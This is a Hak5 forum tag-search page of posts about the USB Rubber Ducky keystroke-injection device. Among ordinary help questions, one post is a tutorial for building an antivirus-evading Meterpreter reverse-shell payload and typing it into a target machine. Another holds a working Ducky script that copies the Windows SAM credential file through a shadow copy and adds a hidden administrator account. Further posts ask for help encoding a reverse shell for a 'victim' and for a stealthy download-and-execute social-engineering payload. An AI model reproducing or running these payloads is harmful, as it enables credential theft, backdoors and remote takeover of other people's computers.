Jump to content

Search the Community

Showing results for tags 'DUCKY'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Below are instructions for using Veil-Evasion to produce a Windows Powershell payload for a Meterpeter reverse TCP connection and injecting it using a USB Rubber Ducky. This is my first tutorial post, so if my formatting is a bit off... too bad ;) This method has a few benefits over the method provided using the "Simple-Ducky" program. It is injected completely through text input typed in by the Ducky into the Windows Command Shell It does not require the target computer to download a compiled file from a web server to set up the connection. You do not have to host a web server for the payload. (Less open ports on your machine, always a good thing.) Virus scanners are (hopefully) not going to pick this up because it is being entered directly into the Command Shell by Ducky. The flip side is that this is a larger payload for Ducky to type out so you will have to plan accordingly. Initial Setup (If you are running Kali, BlackBox, Backtrack, etc. you are probably almost set up already.) Install and setup Metasploit if you have not already. Install and setup Veil-Evasion (Homepage is here). Veil-Evasion is now available in the Kali repository. Use: apt-get install veil-evasion -y Note on initial install: You need to run veil-evasion after it is loaded by apt-get to set everything up. It says you don't have to run it as root, but you need to run it as root! Setup can take a bit. Set up Ducky Encoder or whatever you choose to use to make your inject.bin. Payload Generation Start veil-evasion. Type "list" to see the list of available payloads. Enter the number for the "powershell/meterpreter/rev_tcp" payload. (Was 22 for me.) Set you LHOST and LPORT the same as you would do setting up a payload in Metasploit. Type "generate". Enter the name you want for the payload. Veil will generate the payload in a .bat file in the "Veil-Output" directory under "source". (Most likely in the /usr/share/ directory.) Veil will also generate a Metasploit resource file for setting up a listener that you can use if you want. However, if you are behind a NAT router you will need to plan accordingly. Find and open the .bat file in the text editor of your choice and copy off the first section of the file as follows: powershell.exe -Nop.....ReadToEnd();" (The first .ReadToEnd() and don't miss the quotation mark at the end, you will need that.) If your target is a 64 bit machine you will need to add "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\" prior to the powershell.exe in order for your payload to work. Set up your Ducky script as you like to account for driver install, etc. Have it open a standard command shell and copy and paste the text you cut out above into the Ducky script as a STRING: Create you inject.bin file and put it on your Ducky.Operation Start a windows/meterpreter/reverse_tcp listener in Metasploit on your machine. (32 bit, not the x64 payload) Plug the Ducky into your target machine and away you go. The Command Shell window will automatically close once the Powershell script begins to execute. You may need to migrate to another x86 process to get full Meterpreter functions. A few notes If you try to run this sever times in quick succession on a target machine the subsequent tries may not go through as Powershell likes to hang on for a bit. Killing the initial process after migrating might fix this. I've tested this on the following:Windows 7 Pro x64 (physical machine with a physical network, through a restrictive firewall... Reverse connections rock!) Windows 8.1 Pro x64 - Virtual Windows 10 Pro x64 Technical Preview - Virtual Windows Server 2008 R2 - Virtual Windows Server 2012 R2 - Virtual Enjoy.
  2. Is there any way to make a DuckSlurp without Powershell or the run command? I can't seem to get it to work on OSX
  3. I'm trying to get my usb ducky to save the sam file to the flash drive as well as create a new admin user. I'm not really sure where I am going wrong here but if anyone has advice or a code that works it would be greatly appreciated!!! DELAY 5000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 750 ENTER ALT SPACE DELAY 750 STRING m DELAY 750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING Net User Admin tacos /ADD ENTER STRING Net LocalGroup Administrators Admin /ADD ENTER DELAY 500 STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v Admin /t REG_DWORD /d 0 /f ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY’ } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY’ } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config-d04a8.ps1 ENTER DELAY 750 ALT F4 DELAY 1500 GUI r DELAY 750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1500 STRING m DELAY 1500 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER
  4. Hello... I saw that there is a 'Composite Duck 4x CAPS Trigger' for the Ducky. I have downloaded and compiled some of the Source Code but I didn't see any code for the x4 Caps trigger. I know midnitesnake is working with this, but I wondered if it was possible to get a copy of the source code for the x4 Caps Normally I would experiment with while loops and if statements, but I really don't want to damage the Ducky. It's not that I'm lazy, I just don't want to damage my little Ducky. Any help would be great. Thanks in advance.
  5. Hello Guys I need help with the a payload to get a reverse shell using the ruber ducky: I tried to use the powerducky script to get a reverse shell and no luck... I figured it out it was because my victim was an X64 and not a 386 ... So i went ahead and modified my powershell shell script to detect if my victim is X64... now when I run manually my malicious powershell script on my victim and i have a htpps listener in my attacking machine it works perfectly ... now the challenge i have is encoding my powershell script in base 64 so I can ultimately use in my inject.bin.... This is what I used to encode my powershell script: $Content = Get-Content -Path <path to my file> -Encoding Byte $Base64 = [system.Convert]::ToBase64String($Content) $Base64 | Out-File <path to encoded file> Also tried iconv in Linux: $Content = Get-Content -Path <path to my file> -Encoding Byte Encode="`cat $Content | iconv --to-code UTF-16LE | base64 -w 0`" and then dumping the value of variable encode... Whenever I tried to execute my payload in my victim (after loading the inject.bin in the ducky) the ducky starts to delivers the base 64 payload... however powershell truncates the payload while processing the base 64 string .. thus not getting a reverse shell.... After trying to run manually the powershell script... powershell -Enc <base64 string> i got the message in my victim that the string is not a valid base 64 string.... Anyone can point me on the command I need to run to convert my powershell script into a valid base 64 string so powershell can execute it? PS the reverse shell (reflective and web delivered) in powerducky have the same problem... whenever the inject.bin runs in the victim... the base 64 string is truncated in the victim and no reverse shell is sent to the attacking machine... Thanks
  6. Hello gentleman, Sorry in advance if this issue have been answered before, I was searching the forum for some information and did´nt found something that clarify my needs. I am doing my first tests with ducky in some Windows 7 / 8 machines. What I noticed was that in both English and Portuguese (pt-br) systems, when I can the command "powershell Start-Process cmd -Verb runAs" As you can see, when UAC prompt appears, Windows Powershell continues to have the focus, so I can´t submit the command "ALT S" (equivalent to ALT Y on English systems) to the UAC window and go on with my Command Quacking. In another thread I see a friend of the forum saying that solved using "GUI TAB" command, but over here this is not working. Some of you know how I can go ahead to solve this? Ty!
  7. Hello, I am new the usb ducky and creating files. I'm trying to run this command... java -jar duckencoder.jar -i example_1.txt -o inject.bin but it's saying that Could not find or load main class -jar. I am using a Mac, instead of linux or windows, I'm not sure if that makes a difference? Any help would be greatly appreciated.
  8. Is it possible to make a payload for the USB Rubber Ducky Platform in which you get an admin cmd on windows xp thus bypassing uac I have tried all windows 7 Command Prompt elevation tricks but none worked for me does such a payload exist My Target: VM Windows XP SP3 Professional
  9. DuckyEncoder GUI 1.0 I've developed a GUI for the DuckyEncoder. It's based on the DuckyEncoder 2.6.3, but is a standalone, runnable jar file. No installation required! It should work on all operating systems, but I only tested it with Windows! You can specify an input file, a layout file, and an ouput file. It is possible to browse the computer for said files, or enter the path manually! The layout files are included in the jar, so you don't need an extra resources folder somewhere on your computer. Leave the layout file blank, and the standard one is being used. If you specify an input file, the editor automatically opens it and shows the content including syntax highlighting (for the most commands, not all keys yet). It is also possible to just start writing your code in the editor and export it right away, or saving the code in a file! If you click export bin and everything's ok, the .bin file will be exported to the path specified in output path! To run the program just double click the downloaded .jar file! Reviews are highly appreciated! If you notice any bugs or have suggestions for more features - tell me! This program is open source licensed - https://github.com/m1s73r/duckygui (If you're a developer and want to help contact me!) DOWNLOAD
  10. Ok! I've been looking at this post: https://forums.hak5.org/index.php?/topic/2361-usb-switchblade-development/ and I'm wondering if there is going to be another version of the ducky with a U3 partition/launchpad. This would make the ducky even more powerful than what it already is. Is there any thoughts about a new version of the Rubber Ducky?
  11. Hi, I'm new in this, someone could help me with the steps to make a usb (Twin duck)?? I would appreciate it very much.
  12. my cmd window say that it cant access the jar and I'M DOING EVERYTHING ELSE RIGHT all of the files are in the same folders I've started the cmd from the same folder
  13. I am in Australia and using a US Keyboard as is standard here, and I encode using ducky encoder with the US keyboard. The problem is that when i first insert the ducky it runs the script but types really random functions and does nothing related to the code. However, when i then press the replay button on the ducky, it works fine and will continue to work correctly no matter how many times i press it. Thoughts?
  14. When I get a rubber ducky (due to the store being out of stock), I want to make a code that will run without being interrupted. Is it possible to make Ducky disconnect the keyboard and mouse, then when the code finishes, it reconnects them and then wipes code, etc.? If this is possible can anyone help me. (I'm being proactive and making scripts before I get my ducky.) And also, does anyone know how often they restock? Trying to get a Ducky and I'm in the UK.
  15. Hello, I have just received my first duckies and started playing around with them and I gotta admit it is pretty fun. I have also found a great interest in the wget + execute function, especially if something can be worked out to do the same for .app on Mac OS X (if someone could help me out with that it'd help, I don't have any mac to help me out find which keys would allow me to remote download + execute). But most importantly, what's bothering me, is the lack of stealthiness of the actions. *** Bob tells his friend he needs a certain doc Adam answers him sure, let me put it on my USB and let me hand it to you. Adam quickly makes a payload (pre-written and probably pre-compiled too) and puts it inside the SD card. Adam tells him hey, here's the file! Bob inserts the rubber duckyB Bob only sees a couple of things popping up by themselves on the screen, but never ends up with the actual file he's looking for. *** This is a payload for social engineering 2.0 that I'm looking for, as, for now, the only ones available can remotely download and execute files, or fuckup the OS it's on, but anyone looking at the screen while the USB key is plugged will still see something fishy going on, especially if nothing happens afterwards. THEREFORE (getting to the point), I'd like to know if a payload exists, or if it is even possible to actually mount the SD card that is inside the emulator so that we get a double-entry, one of an emulator, and the other one of a stoarge unit, that would allow the opening of a new folder that would appear as an external drive to the user, and where we could put whatever .doc or .pdf that is needed to be transfered? Such a method would allow stealth targetted-infection and much less social engineering and "hoping" that someone just picks up a random USB key and plugs it in to see what happens. Also, the success rate would be much bigger, since you'd be standing right by the person inserting it and he would trust you, since after the little payload of wget and execute is loaded, a windows showing up a mounted external drive with the requested files appear (any non-IT guy would then assume that whatever happened beforewards was just to mount the card/storage) It has been brought to me the idea of creating a folder in %temp% and name it USB KEY where we would download the file to afterwards open it, but it still seems fishy in case the internet connection isn't quite good, and simply because of the location of the "drive", and, MOST OF ALL, because there actually IS an SD card that should be available to be mounted somehow. I have read through a lot of forums and guides and yet couldn't find a payload or any hints as to how to make the emulator recognize the SD card it's using as a drive that's browsable and put some files inside that could be used by whoever plugs the key. If anyone could help me out with that, this would bring the ducky's power to a brand new level. Thanks in advance, -pineapple
  16. hello, anyone can help me to create a script to download a picture and put it to wallpaper. thank you
  17. Hi there, I'm trying to find if there is a way to get my hand on a Wifi Pineapple or a USB Rubber Ducky for some educational pentesting, I already tried to buy it from the HakShop, but unfortunally it dosen't ship to Brazil.. Is there any way I could buy it ?
  18. Big Up Date The Project is now at Halt due to fact that my Rubber Ducky Has Red Light And i cant fix it so i will be buying a new one after i saved up for WiFi Pineapple i will be still coding it but cant really test any thing that needs a rubber ducky SORRY Read Me First This project was pick up From Hak5 User SEE CREDITS FOR NAME'S But seem project was drop so i takeing on my self to carry this on due to amount of people Requesting this am not coder i only really know batch (KILL me i know) i fort why not make something of use and not other webpage reader like android store is full of them so this will take time more time than any one else so thanks Know Bug's 1.Load Payload dose not work 2.save .bin dose not save to cd but to phone internal memory Credit Old Project Owner: joseph pintozzi I have given right to edit this project and give modified Project away UPDATE'S V0.0.1 Exported project to android studio ( taken me last 2 days to fix it all then Google make update that make all my work go to hell so GG all fixed now) Working on save as it not playing nice may need to make folder for all saved for trying to work out how to make it open ever .text or .bin will look about may need some help google my friend ========================================================================================== Q1.Will it be on Google store A1.i hope so but google may not like what it used for but i cant see why not they have terminal so why hell not i will be email them to see were i stand Dont worry if not i will Host it on my own site For you guys Q2.How much will this cost? A2.Free Why? one it not my it free code and two Shareing is caring Q3.Can we the users help ? A3.God yes i will all ways love your input and help as i said i am very new so it will help me if i am stuck Q4.Can we ask for stuff to be added ? A4.Yes but keep in mind i am new But ye for sure i cant think this all out on my own If you like to post in Q&A Just put Q.A In your pm or comment and it will be add ==========================================================================================
  19. Here's a bash script that lets you easily compile scripts as well as flash firmware! Unfortunately, when I paste the script directly on to this page, it isn't shown correctly so here is a dropbox link to it (my Github account has messed up a bit so I can't sync my repositories anymore): Link (Click Here!) Here's the script if you want to review it before downloading:
  20. Hey, I am looking for a USB Rubber Ducky from someone in Europe because it's 47 dollars to ship from the U.S.A to the Netherlands. Let me know if you want to sell yours and if you live in Europe Thanks! - Jesse
  21. Hi guys! So I'm deplyoing my Duck at work , and I have a script (Thanks to DuckToolKit) that saves the user and hardware info of their computer. We're doing an inventory basically. The output of the script saves it as a Report.zip, but I have about 200 computers to go through. Is it possible to have an IF 'Report.zip'=EXIST Then EXIST +1 Basically if Report.zip exists , rename the file to Report1, and so on so the final will have Report, Report1, Report 2, etc. Thanks!! I'll attach my script below: DELAY 1650 GUI r DELAY 1650 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1650 STRING ADMINUSERNAME DELAY 1650 TAB STRING DUMBPASSWORD DELAY 1650 ENTER DELAY 1650 ALT y DELAY 1650 ENTER ALT SPACE DELAY 1650 STRING m DELAY 1650 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem ENTER STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime ENTER STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME) ENTER STRING $SerialNo = $SysSerialNo.SerialNumber ENTER STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model ENTER STRING $SysManufacturer = $SysInfo.Manufacturer ENTER STRING $SysModel = $SysInfo.Model ENTER STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption ENTER STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" ENTER STRING $HD = [math]::truncate($disk.Size / 1GB) ENTER STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) ENTER STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize ENTER STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) ENTER STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name ENTER STRING $Cpu = $SysCpu.Name ENTER STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber ENTER STRING $HardSerialNo = $HardSerial.SerialNumber ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name ENTER STRING $graphicsCard = gwmi win32_VideoController |select Name ENTER STRING $graphics = $graphicsCard.Name ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 ENTER STRING $DriveLetter = $CDDrive.Drive ENTER STRING $DriveName = $CDDrive.Caption ENTER STRING $Disk = $DriveLetter + '' + $DriveName ENTER STRING $Firewall = New-Object -com HNetCfg.FwMgr ENTER STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile ENTER STRING $FireProfile = $FireProfile.FirewallEnabled ENTER STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>" ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HP16GB' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCK' } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1650 STRING C:\Windows\config-47bc5.ps1 ENTER DELAY 1650 ALT F4 DELAY 1650 GUI r DELAY 1650 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1650 STRING ADMINUSERNAME DELAY 1650 TAB STRING ADMINLAMEPASS DELAY 1650 ENTER DELAY 1650 DELAY 1650 ALT y DELAY 1650 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1650 STRING m DELAY 1650 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1650 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER
  22. Ello everyone, I am very new with the ducky, and I am looking for some help. As I understand, powershell must be installed for any of the "Duck Toolkit" payloads to work. I was interested in DNS poisioning, but I cant get it to work correctly. I even tried to remove the command prompt section and have an administrative cmd already up and running before I plugged in my ducky. Everything went smoothly, but it still did nothing. I have disabled all my anti-virus programs and even tried a few random other DNS poisioning/host mod scripts that I randomly found on here and other websites. No luck. Is there a way to: 1. copy "hosts.txt" (pre-created file) from my single ducky sd card to the \Windows\System32\drivers\etc folder 2. delete "hosts" file in \Windows\System32\drivers\etc folder 3. rename "hosts.txt" to just "hosts" Please, no powershell. It seems pretty simple, but I still have no idea what I am doing.
  23. I just got my Rubber Ducky a few hours ago and when I attempt to use it on my Mac it pop up with the Keyboard Setup Assistant instead of executing the inject.bin. Running Mavericks 10.9.2. I've read around this forum and have read about updating the firmware to 2.1 and changing the PIN and VIN. I am new to the terminal and I don't really know how to update the firmware. I attempted to install dfu-programmer, but got a usb.h error, so I read around more and downloaded usblib installed that, but still got the error. I copied the usb.h file into the /usb/include location, still got errors, but it may have worked... I dont know. Even with this maybe installed I don't know how to exactly update the firmware on my Rubber Ducky. Can someone please direct me to or instruct me on how to get it to work on Mavericks and bypass the Keyboard Setup? Thank you in advance. note: it functions completely fine on my windows xp machine.
  24. Hi ! I know that you can already find a small number of payloads on Github, but there are many more that have been created by the community. For example, we found none for Android on GitHub. And, I have experienced the difficulty to find exactly what I need ;) That's why I think it would be a good initiative to gather as much as possible payloads on this topic. If you have created an effective and fun on, or if you use regularly one made by another member, why not post it below to share it ? (select those who are not already on GitHub for the moment please) If you are interested, try to complete a short form of this type and post it below. Title : Author : Target : Description : Obviously, if it does not seem to be a good idea, let me know -_-
  25. So I got my rubber ducky, put the micro sd card into the USB adapter and plugged it in to a computer. I have tried multiple machines with various operating systems and every time except for two i have received a message that says "Please insert disk into removable disk(*drive letter here*)" I have tried changing the drive letter, disabling some drivers, and taking out the us and putting it back in. I have also tried multiple ports and nothing seems to do the trick. Anyone know what to do?
×
×
  • Create New...